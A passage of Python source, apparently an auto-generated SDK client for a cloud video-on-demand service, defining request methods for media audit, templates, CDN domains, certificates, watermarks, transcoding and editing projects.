api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"AppId": app_id,
"PageSize": page_size,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_ai_media_audit_job(
self,
job_id=None,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('GetAIMediaAuditJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"JobId": job_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def submit_ai_media_audit_job(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
media_id=None,
template_id=None):
api_request = APIRequest('SubmitAIMediaAuditJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"MediaId": media_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def get_media_audit_result(
self,
resource_owner_id=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetMediaAuditResult', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def get_media_audit_result_detail(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetMediaAuditResultDetail', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def get_media_audit_result_timeline(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetMediaAuditResultTimeline', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def add_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_config=None,
template_type=None,
template_name=None,
owner_id=None):
api_request = APIRequest('AddAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateConfig": template_config,
"TemplateType": template_type,
"TemplateName": template_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
template_id=None):
api_request = APIRequest('DeleteAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def update_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_config=None,
template_name=None,
owner_id=None,
template_id=None):
api_request = APIRequest('UpdateAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateConfig": template_config,
"TemplateName": template_name,
"OwnerId": owner_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def get_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
template_id=None):
api_request = APIRequest('GetAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def list_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_type=None,
owner_id=None):
api_request = APIRequest('ListAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateType": template_type,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_default_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_type=None,
owner_id=None):
api_request = APIRequest('GetDefaultAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateType": template_type,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def set_default_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
template_id=None):
api_request = APIRequest('SetDefaultAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def describe_vod_domain_log(
self,
start_time=None,
page_number=None,
page_size=None,
domain_name=None,
end_time=None,
owner_id=None):
api_request = APIRequest('DescribeVodDomainLog', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"PageNumber": page_number,
"PageSize": page_size,
"DomainName": domain_name,
"EndTime": end_time,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_domain_certificate_info(self, domain_name=None, owner_id=None):
api_request = APIRequest('DescribeVodDomainCertificateInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {"DomainName": domain_name, "OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_domain_traffic_data(
self,
location_name_en=None,
start_time=None,
isp_name_en=None,
domain_name=None,
end_time=None,
owner_id=None,
interval=None):
api_request = APIRequest('DescribeVodDomainTrafficData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"LocationNameEn": location_name_en,
"StartTime": start_time,
"IspNameEn": isp_name_en,
"DomainName": domain_name,
"EndTime": end_time,
"OwnerId": owner_id,
"Interval": interval}
return self._handle_request(api_request).result
def describe_vod_domain_bps_data(
self,
location_name_en=None,
start_time=None,
isp_name_en=None,
domain_name=None,
end_time=None,
owner_id=None,
interval=None):
api_request = APIRequest('DescribeVodDomainBpsData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"LocationNameEn": location_name_en,
"StartTime": start_time,
"IspNameEn": isp_name_en,
"DomainName": domain_name,
"EndTime": end_time,
"OwnerId": owner_id,
"Interval": interval}
return self._handle_request(api_request).result
def describe_vod_domain_usage_data(
self,
start_time=None,
type_=None,
area=None,
domain_name=None,
end_time=None,
owner_id=None,
field=None):
api_request = APIRequest('DescribeVodDomainUsageData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"Type": type_,
"Area": area,
"DomainName": domain_name,
"EndTime": end_time,
"OwnerId": owner_id,
"Field": field}
return self._handle_request(api_request).result
def describe_vod_certificate_list(self, security_token=None, domain_name=None, owner_id=None):
api_request = APIRequest('DescribeVodCertificateList', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def batch_stop_vod_domain(self, security_token=None, domain_names=None, owner_id=None):
api_request = APIRequest('BatchStopVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"DomainNames": domain_names,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_vod_domain(
self,
security_token=None,
owner_account=None,
domain_name=None,
owner_id=None):
api_request = APIRequest('DeleteVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"OwnerAccount": owner_account,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def set_vod_domain_certificate(
self,
security_token=None,
ssl_pub=None,
cert_name=None,
ssl_protocol=None,
domain_name=None,
owner_id=None,
region=None,
ssl_pri=None):
api_request = APIRequest('SetVodDomainCertificate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"SSLPub": ssl_pub,
"CertName": cert_name,
"SSLProtocol": ssl_protocol,
"DomainName": domain_name,
"OwnerId": owner_id,
"Region": region,
"SSLPri": ssl_pri}
return self._handle_request(api_request).result
def delete_vod_specific_config(
self,
security_token=None,
config_id=None,
domain_name=None,
owner_id=None):
api_request = APIRequest('DeleteVodSpecificConfig', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"ConfigId": config_id,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def batch_set_vod_domain_configs(
self,
functions=None,
security_token=None,
domain_names=None,
owner_account=None,
owner_id=None):
api_request = APIRequest('BatchSetVodDomainConfigs', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"Functions": functions,
"SecurityToken": security_token,
"DomainNames": domain_names,
"OwnerAccount": owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def add_vod_domain(
self,
sources=None,
security_token=None,
owner_account=None,
scope=None,
domain_name=None,
owner_id=None,
check_url=None):
api_request = APIRequest('AddVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"Sources": sources,
"SecurityToken": security_token,
"OwnerAccount": owner_account,
"Scope": scope,
"DomainName": domain_name,
"OwnerId": owner_id,
"CheckUrl": check_url}
return self._handle_request(api_request).result
def describe_vod_refresh_quota(self, security_token=None, owner_id=None):
api_request = APIRequest('DescribeVodRefreshQuota', 'GET', 'http', 'RPC', 'query')
api_request._params = {"SecurityToken": security_token, "OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_refresh_tasks(
self,
object_path=None,
domain_name=None,
end_time=None,
start_time=None,
owner_id=None,
page_number=None,
resource_group_id=None,
security_token=None,
page_size=None,
object_type=None,
task_id=None,
status=None):
api_request = APIRequest('DescribeVodRefreshTasks', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ObjectPath": object_path,
"DomainName": domain_name,
"EndTime": end_time,
"StartTime": start_time,
"OwnerId": owner_id,
"PageNumber": page_number,
"ResourceGroupId": resource_group_id,
"SecurityToken": security_token,
"PageSize": page_size,
"ObjectType": object_type,
"TaskId": task_id,
"Status": status}
return self._handle_request(api_request).result
def describe_vod_domain_configs(
self,
function_names=None,
security_token=None,
domain_name=None,
owner_id=None):
api_request = APIRequest('DescribeVodDomainConfigs', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"FunctionNames": function_names,
"SecurityToken": security_token,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_user_domains(
self,
func_filter=None,
check_domain_show=None,
security_token=None,
cdn_type=None,
page_size=None,
domain_name=None,
owner_id=None,
func_id=None,
page_number=None,
domain_status=None,
domain_search_type=None):
api_request = APIRequest('DescribeVodUserDomains', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"FuncFilter": func_filter,
"CheckDomainShow": check_domain_show,
"SecurityToken": security_token,
"CdnType": cdn_type,
"PageSize": page_size,
"DomainName": domain_name,
"OwnerId": owner_id,
"FuncId": func_id,
"PageNumber": page_number,
"DomainStatus": domain_status,
"DomainSearchType": domain_search_type}
return self._handle_request(api_request).result
def update_vod_domain(
self,
top_level_domain=None,
sources=None,
security_token=None,
domain_name=None,
owner_id=None):
api_request = APIRequest('UpdateVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"TopLevelDomain": top_level_domain,
"Sources": sources,
"SecurityToken": security_token,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def refresh_vod_object_caches(
self,
security_token=None,
object_path=None,
owner_id=None,
object_type=None):
api_request = APIRequest('RefreshVodObjectCaches', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"ObjectPath": object_path,
"OwnerId": owner_id,
"ObjectType": object_type}
return self._handle_request(api_request).result
def preload_vod_object_caches(self, security_token=None, object_path=None, owner_id=None):
api_request = APIRequest('PreloadVodObjectCaches', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"ObjectPath": object_path,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def batch_start_vod_domain(self, security_token=None, domain_names=None, owner_id=None):
api_request = APIRequest('BatchStartVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"DomainNames": domain_names,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_domain_detail(self, security_token=None, domain_name=None, owner_id=None):
api_request = APIRequest('DescribeVodDomainDetail', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
vod_template_id=None,
owner_id=None):
api_request = APIRequest('DeleteVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VodTemplateId": vod_template_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
vod_template_id=None,
owner_id=None):
api_request = APIRequest('GetVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VodTemplateId": vod_template_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def list_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_type=None,
app_id=None,
owner_id=None):
api_request = APIRequest('ListVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateType": template_type,
"AppId": app_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_config=None,
name=None,
vod_template_id=None,
owner_id=None):
api_request = APIRequest('UpdateVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateConfig": template_config,
"Name": name,
"VodTemplateId": vod_template_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def add_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_config=None,
template_type=None,
app_id=None,
name=None,
owner_id=None,
sub_template_type=None):
api_request = APIRequest('AddVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateConfig": template_config,
"TemplateType": template_type,
"AppId": app_id,
"Name": name,
"OwnerId": owner_id,
"SubTemplateType": sub_template_type}
return self._handle_request(api_request).result
def create_upload_attached_media(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_ids=None,
icon=None,
description=None,
file_size=None,
owner_id=None,
title=None,
business_type=None,
tags=None,
storage_location=None,
user_data=None,
media_ext=None,
file_name=None,
cate_id=None,
app_id=None):
api_request = APIRequest('CreateUploadAttachedMedia', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateIds": cate_ids,
"Icon": icon,
"Description": description,
"FileSize": file_size,
"OwnerId": owner_id,
"Title": title,
"BusinessType": business_type,
"Tags": tags,
"StorageLocation": storage_location,
"UserData": user_data,
"MediaExt": media_ext,
"FileName": file_name,
"CateId": cate_id,
"AppId": app_id}
return self._handle_request(api_request).result
def register_media(
self,
user_data=None,
resource_owner_id=None,
template_group_id=None,
resource_owner_account=None,
owner_id=None,
register_metadatas=None,
workflow_id=None):
api_request = APIRequest('RegisterMedia', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"UserData": user_data,
"ResourceOwnerId": resource_owner_id,
"TemplateGroupId": template_group_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"RegisterMetadatas": register_metadatas,
"WorkflowId": workflow_id}
return self._handle_request(api_request).result
def delete_watermark(
self,
watermark_id=None,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('DeleteWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"WatermarkId": watermark_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_watermark(
self,
watermark_id=None,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('GetWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"WatermarkId": watermark_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def set_default_watermark(
self,
watermark_id=None,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('SetDefaultWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"WatermarkId": watermark_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def list_watermark(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
app_id=None,
page_size=None,
owner_id=None):
api_request = APIRequest('ListWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"AppId": app_id,
"PageSize": page_size,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_watermark(
self,
watermark_id=None,
resource_owner_id=None,
resource_owner_account=None,
name=None,
owner_id=None,
watermark_config=None):
api_request = APIRequest('UpdateWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"WatermarkId": watermark_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Name": name,
"OwnerId": owner_id,
"WatermarkConfig": watermark_config}
return self._handle_request(api_request).result
def add_watermark(
self,
resource_owner_id=None,
resource_owner_account=None,
app_id=None,
name=None,
file_url=None,
owner_id=None,
type_=None,
watermark_config=None):
api_request = APIRequest('AddWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"Name": name,
"FileUrl": file_url,
"OwnerId": owner_id,
"Type": type_,
"WatermarkConfig": watermark_config}
return self._handle_request(api_request).result
def get_media_dna_result(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetMediaDNAResult', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def delete_mezzanines(
self,
resource_owner_id=None,
resource_owner_account=None,
force=None,
owner_id=None,
video_ids=None):
api_request = APIRequest('DeleteMezzanines', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Force": force,
"OwnerId": owner_id,
"VideoIds": video_ids}
return self._handle_request(api_request).result
def update_image_infos(
self,
resource_owner_id=None,
update_content=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('UpdateImageInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"UpdateContent": update_content,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_image(
self,
resource_owner_id=None,
image_type=None,
resource_owner_account=None,
image_ur_ls=None,
video_id=None,
owner_id=None,
delete_image_type=None,
image_ids=None):
api_request = APIRequest('DeleteImage', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ImageType": image_type,
"ResourceOwnerAccount": resource_owner_account,
"ImageURLs": image_ur_ls,
"VideoId": video_id,
"OwnerId": owner_id,
"DeleteImageType": delete_image_type,
"ImageIds": image_ids}
return self._handle_request(api_request).result
def list_audit_security_ip(self, security_group_name=None):
api_request = APIRequest('ListAuditSecurityIp', 'GET', 'http', 'RPC', 'query')
api_request._params = {"SecurityGroupName": security_group_name}
return self._handle_request(api_request).result
def set_audit_security_ip(self, operate_mode=None, security_group_name=None, ips=None):
api_request = APIRequest('SetAuditSecurityIp', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"OperateMode": operate_mode,
"SecurityGroupName": security_group_name,
"Ips": ips}
return self._handle_request(api_request).result
def upload_media_by_url(
self,
resource_owner_id=None,
resource_owner_account=None,
message_callback=None,
owner_id=None,
priority=None,
storage_location=None,
user_data=None,
template_group_id=None,
upload_metadatas=None,
upload_ur_ls=None,
app_id=None,
workflow_id=None):
api_request = APIRequest('UploadMediaByURL', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"MessageCallback": message_callback,
"OwnerId": owner_id,
"Priority": priority,
"StorageLocation": storage_location,
"UserData": user_data,
"TemplateGroupId": template_group_id,
"UploadMetadatas": upload_metadatas,
"UploadURLs": upload_ur_ls,
"AppId": app_id,
"WorkflowId": workflow_id}
return self._handle_request(api_request).result
def update_video_infos(
self,
resource_owner_id=None,
update_content=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('UpdateVideoInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"UpdateContent": update_content,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def search_media(
self,
resource_owner_id=None,
resource_owner_account=None,
match=None,
session_id=None,
owner_id=None,
scroll_token=None,
page_no=None,
search_type=None,
page_size=None,
sort_by=None,
result_types=None,
fields=None):
api_request = APIRequest('SearchMedia', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Match": match,
"SessionId": session_id,
"OwnerId": owner_id,
"ScrollToken": scroll_token,
"PageNo": page_no,
"SearchType": search_type,
"PageSize": page_size,
"SortBy": sort_by,
"ResultTypes": result_types,
"Fields": fields}
return self._handle_request(api_request).result
def get_video_infos(
self,
resource_owner_id=None,
resource_owner_account=None,
addition_type=None,
owner_id=None,
video_ids=None):
api_request = APIRequest('GetVideoInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"AdditionType": addition_type,
"OwnerId": owner_id,
"VideoIds": video_ids}
return self._handle_request(api_request).result
def submit_preprocess_jobs(
self,
resource_owner_id=None,
resource_owner_account=None,
video_id=None,
owner_id=None,
preprocess_type=None):
api_request = APIRequest('SubmitPreprocessJobs', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"OwnerId": owner_id,
"PreprocessType": preprocess_type}
return self._handle_request(api_request).result
def describe_play_video_statis(
self,
start_time=None,
end_time=None,
video_id=None,
owner_id=None):
api_request = APIRequest('DescribePlayVideoStatis', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"EndTime": end_time,
"VideoId": video_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_play_user_total(self, start_time=None, end_time=None, owner_id=None):
api_request = APIRequest('DescribePlayUserTotal', 'GET', 'http', 'RPC', 'query')
api_request._params = {"StartTime": start_time, "EndTime": end_time, "OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_play_user_avg(self, start_time=None, end_time=None, owner_id=None):
api_request = APIRequest('DescribePlayUserAvg', 'GET', 'http', 'RPC', 'query')
api_request._params = {"StartTime": start_time, "EndTime": end_time, "OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_play_top_videos(self, page_size=None, owner_id=None, biz_date=None, page_no=None):
api_request = APIRequest('DescribePlayTopVideos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"PageSize": page_size,
"OwnerId": owner_id,
"BizDate": biz_date,
"PageNo": page_no}
return self._handle_request(api_request).result
def list_snapshots(
self,
resource_owner_id=None,
resource_owner_account=None,
snapshot_type=None,
page_no=None,
page_size=None,
video_id=None,
owner_id=None,
auth_timeout=None):
api_request = APIRequest('ListSnapshots', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"SnapshotType": snapshot_type,
"PageNo": page_no,
"PageSize": page_size,
"VideoId": video_id,
"OwnerId": owner_id,
"AuthTimeout": auth_timeout}
return self._handle_request(api_request).result
def submit_transcode_jobs(
self,
user_data=None,
resource_owner_id=None,
template_group_id=None,
resource_owner_account=None,
video_id=None,
override_params=None,
owner_id=None,
priority=None,
encrypt_config=None,
pipeline_id=None):
api_request = APIRequest('SubmitTranscodeJobs', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"UserData": user_data,
"ResourceOwnerId": resource_owner_id,
"TemplateGroupId": template_group_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"OverrideParams": override_params,
"OwnerId": owner_id,
"Priority": priority,
"EncryptConfig": encrypt_config,
"PipelineId": pipeline_id}
return self._handle_request(api_request).result
def list_live_record_video(
self,
resource_owner_id=None,
resource_owner_account=None,
domain_name=None,
end_time=None,
start_time=None,
owner_id=None,
app_name=None,
page_no=None,
page_size=None,
sort_by=None,
stream_name=None,
query_type=None):
api_request = APIRequest('ListLiveRecordVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"DomainName": domain_name,
"EndTime": end_time,
"StartTime": start_time,
"OwnerId": owner_id,
"AppName": app_name,
"PageNo": page_no,
"PageSize": page_size,
"SortBy": sort_by,
"StreamName": stream_name,
"QueryType": query_type}
return self._handle_request(api_request).result
def create_audit(self, audit_content=None):
api_request = APIRequest('CreateAudit', 'GET', 'http', 'RPC', 'query')
api_request._params = {"AuditContent": audit_content}
return self._handle_request(api_request).result
def get_audit_history(self, page_no=None, page_size=None, video_id=None, sort_by=None):
api_request = APIRequest('GetAuditHistory', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"PageNo": page_no,
"PageSize": page_size,
"VideoId": video_id,
"SortBy": sort_by}
return self._handle_request(api_request).result
def list_ai_job(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
job_ids=None,
owner_id=None):
api_request = APIRequest('ListAIJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"JobIds": job_ids,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def submit_ai_job(
self,
user_data=None,
input=None,
resource_owner_id=None,
types=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
media_id=None,
config=None):
api_request = APIRequest('SubmitAIJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"UserData": user_data,
"Input": input,
"ResourceOwnerId": resource_owner_id,
"Types": types,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"MediaId": media_id,
"Config": config}
return self._handle_request(api_request).result
def get_image_info(
self,
resource_owner_id=None,
image_id=None,
resource_owner_account=None,
output_type=None,
owner_id=None,
auth_timeout=None):
api_request = APIRequest('GetImageInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ImageId": image_id,
"ResourceOwnerAccount": resource_owner_account,
"OutputType": output_type,
"OwnerId": owner_id,
"AuthTimeout": auth_timeout}
return self._handle_request(api_request).result
def delete_stream(
self,
resource_owner_id=None,
resource_owner_account=None,
job_ids=None,
video_id=None,
owner_id=None):
api_request = APIRequest('DeleteStream', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"JobIds": job_ids,
"VideoId": video_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def submit_snapshot_job(
self,
resource_owner_id=None,
resource_owner_account=None,
count=None,
video_id=None,
owner_id=None,
user_data=None,
specified_offset_time=None,
width=None,
interval=None,
sprite_snapshot_config=None,
snapshot_template_id=None,
height=None):
api_request = APIRequest('SubmitSnapshotJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Count": count,
"VideoId": video_id,
"OwnerId": owner_id,
"UserData": user_data,
"SpecifiedOffsetTime": specified_offset_time,
"Width": width,
"Interval": interval,
"SpriteSnapshotConfig": sprite_snapshot_config,
"SnapshotTemplateId": snapshot_template_id,
"Height": height}
return self._handle_request(api_request).result
def update_editing_project(
self,
cover_url=None,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
timeline=None,
description=None,
owner_id=None,
title=None,
project_id=None):
api_request = APIRequest('UpdateEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"CoverURL": cover_url,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"Timeline": timeline,
"Description": description,
"OwnerId": owner_id,
"Title": title,
"ProjectId": project_id}
return self._handle_request(api_request).result
def set_editing_project_materials(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
material_ids=None,
owner_id=None,
project_id=None):
api_request = APIRequest('SetEditingProjectMaterials', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"MaterialIds": material_ids,
